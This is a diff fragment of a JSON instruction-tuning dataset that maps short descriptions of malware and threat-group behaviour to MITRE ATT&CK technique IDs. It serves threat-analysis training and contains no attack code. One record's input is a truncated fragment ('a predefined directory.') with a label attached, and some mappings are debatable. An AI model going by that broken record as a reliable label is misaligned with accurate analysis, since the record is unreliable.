"output": "- T1003.005: OS Credential Dumping - Cached Domain Credentials" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "LaZagne can obtain credential information running Linux processes.", + "output": "- T1003.007: OS Credential Dumping - Proc Filesystem" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "MimiPenguin can dump process memory and extract clear-text credentials.", + "output": "- T1003.007: OS Credential Dumping - Proc Filesystem" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "LaZagne can obtain credential information from /etc/shadow using the shadow.py module.", + "output": "- T1003.008: OS Credential Dumping - /etc/passwd and /etc/shadow" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Bumblebee can capture and compress stolen credentials from the Registry and volume shadow copies.", + "output": "- T1005: Data from Local System" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Frankenstein has enumerated hosts via Empire, gathering various local system information.", + "output": "- T1005: Data from Local System" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "KGH_SPY can send a file containing victim system information to C2.", + "output": "- T1005: Data from Local System" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "KONNI has stored collected information and discovered processes in a tmp file.", + "output": "- T1005: Data from Local System" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Machete searches the File system for files of interest.", + "output": "- T1005: Data from Local System" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Magic Hound has used a web shell to exfiltrate a ZIP file containing a dump of LSASS memory on a compromised machine.", + "output": "- T1005: Data from Local System" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Ramsay can collect Microsoft Word documents from the target's file system, as well as \"\".txt\"\", \"\".doc\"\", and \"\".xls\"\" files from the Internet Explorer cache.\"", + "output": "- T1005: Data from Local System" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "SDBbot has the ability to access the file system on a compromised host.", + "output": "- T1005: Data from Local System" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Threat Group-3390 ran a command to compile an archive of file types of interest from the victim user's directories.", + "output": "- T1005: Data from Local System\n- T1119: Automated Collection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "WellMess can send files from the victim machine to C2.", + "output": "- T1005: Data from Local System" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "During Operation Wocao, threat actors used the `tasklist` command to search for one of its backdoors.", + "output": "- T1007: System Service Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Earth Lusca has used Tasklist to obtain information from a compromised host.", + "output": "- T1007: System Service Discovery\n- T1057: Process Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "SILENTTRINITY can search for modifiable services that could be used for privilege escalation.", + "output": "- T1007: System Service Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "CharmPower can change its C2 channel once every 360 loops by retrieving a new domain from the actors\u2019 S3 bucket.", + "output": "- T1008: Fallback Channels" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Crutch has used a hardcoded GitHub repository as a fallback channel.", + "output": "- T1008: Fallback Channels" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "During Night Dragon, threat actors used company extranet servers as secondary C2 servers.", + "output": "- T1008: Fallback Channels" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "SideTwist has primarily used port 443 for C2 but can use port 80 as a fallback.", + "output": "- T1008: Fallback Channels" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Bazar can query \"\"Windows\\CurrentVersion\\Uninstall\"\" for installed applications.\"", + "output": "- T1012: Query Registry" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "APT28 has used a UEFI (Unified Extensible Firmware Interface) rootkit known as LoJax.", + "output": "- T1014: Rootkit" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Hacking Team UEFI Rootkit is a UEFI BIOS rootkit developed by the company Hacking Team to persist remote access software on some targeted systems.", + "output": "- T1542.001: Pre-OS Boot - System Firmware\n- T1014: Rootkit" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "LoJax is a UEFI BIOS rootkit deployed to persist remote access software on some targeted systems.", + "output": "- T1542.001: Pre-OS Boot - System Firmware\n- T1014: Rootkit" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Rocke has modified /etc/ld.so.preload to hook libc functions in order to hide the installed dropper and mining software in process lists.", + "output": "- T1014: Rootkit\n- T1574.006: Hijack Execution Flow - Dynamic Linker Hijacking" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Cobalt Strike can determine the NetBios name and the IP addresses of targets machines including domain controllers.", + "output": "- T1016: System Network Configuration Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Threat Group-3390 actors use NBTscan to discover vulnerable systems.", + "output": "- T1016: System Network Configuration Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "GoldFinder performed HTTP GET requests to check internet connectivity and identify HTTP proxy servers and other redirectors that an HTTP request traveled through.", + "output": "- T1016.001: System Network Configuration Discovery - Internet Connection Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Neoichor can check for Internet connectivity by contacting bing[.]com with the request format `bing[.]com?id=`.", + "output": "- T1016.001: System Network Configuration Discovery - Internet Connection Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "QakBot can measure the download speed on a targeted host.", + "output": "- T1016.001: System Network Configuration Discovery - Internet Connection Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "QuietSieve can check C2 connectivity with a `ping` to 8.8.8.8 (Google public DNS).", + "output": "- T1016.001: System Network Configuration Discovery - Internet Connection Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Rising Sun can test a connection to a specified network IP address over a specified port number.", + "output": "- T1016.001: System Network Configuration Discovery - Internet Connection Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "SUGARUSH has checked for internet connectivity from an infected host before attempting to establish a new TCP connection.", + "output": "- T1016.001: System Network Configuration Discovery - Internet Connection Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "FIN6 used publicly available tools (including Microsoft's built-in SQL querying tool, osql.exe) to map the internal network and conduct reconnaissance against Active Directory, Structured Query Language (SQL) servers, and NetBIOS.", + "output": "- T1018: Remote System Discovery\n- T1046: Network Service Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "PoetRAT used Nmap for remote system discovery.", + "output": "- T1018: Remote System Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"RATANKBA runs the \"\"net view /domain\"\" and \"\"net view\"\" commands.\"", + "output": "- T1018: Remote System Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Silence has used Nmap to scan the corporate network, build a network topology, and identify vulnerable hosts.", + "output": "- T1018: Remote System Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The TAINTEDSCRIBE command and execution module can perform target system enumeration.", + "output": "- T1018: Remote System Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Doki has used a script that gathers information from a hardcoded list of IP addresses and uploads to an Ngrok URL.", + "output": "- T1020: Automated Exfiltration" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Frankenstein has collected information via Empire, which is automatically sent the data back to the adversary's C2.", + "output": "- T1020: Automated Exfiltration\n- T1041: Exfiltration Over C2 Channel" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "DarkComet can open an active screen of the victim\u2019s machine and take control of the mouse and keyboard.", + "output": "- T1021.001: Remote Services - Remote Desktop Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Adversaries can instruct Duqu to spread laterally by copying itself to shares it has enumerated and for which it has obtained legitimate credentials (via keylogging or other means). The remote host is then infected by using the compromised credentials to schedule a task on remote machines that executes the malware.", + "output": "- T1021.002: Remote Services - SMB/Windows Admin Shares\n- T1078: Valid Accounts\n- T1053.005: Scheduled Task/Job - Scheduled Task" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Blue Mockingbird has used Windows Explorer to manually copy malicious files to remote hosts over SMB.", + "output": "- T1021.002: Remote Services - SMB/Windows Admin Shares" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "HermeticWizard can use a list of hardcoded credentials to to authenticate via NTLMSSP to the SMB shares on remote systems.", + "output": "- T1021.002: Remote Services - SMB/Windows Admin Shares" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Turla used \"\"net use\"\" commands to connect to lateral systems within a network.\"", + "output": "- T1021.002: Remote Services - SMB/Windows Admin Shares" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "TEMP.Veles has relied on encrypted SSH-based tunnels to transfer tools and for remote command/program execution.", + "output": "- T1021.004: Remote Services - SSH" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "a predefined directory.\"", + "output": "- T1025: Data from Removable Media" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Explosive can scan all .exe files located in the USB drive.", + "output": "- T1025: Data from Removable Media" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Machete had a module in its malware to find, encrypt, and upload files from fixed and removable drives.", + "output": "- T1025: Data from Removable Media" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Ramsay can collect data from removable media and stage it for exfiltration.", + "output": "- T1025: Data from Removable Media" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "AppleJeus has XOR-encrypted collected system information prior to sending to a C2. AppleJeus has also used the open source ADVObfuscation library for its components.", + "output": "- T1027: Obfuscated Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as 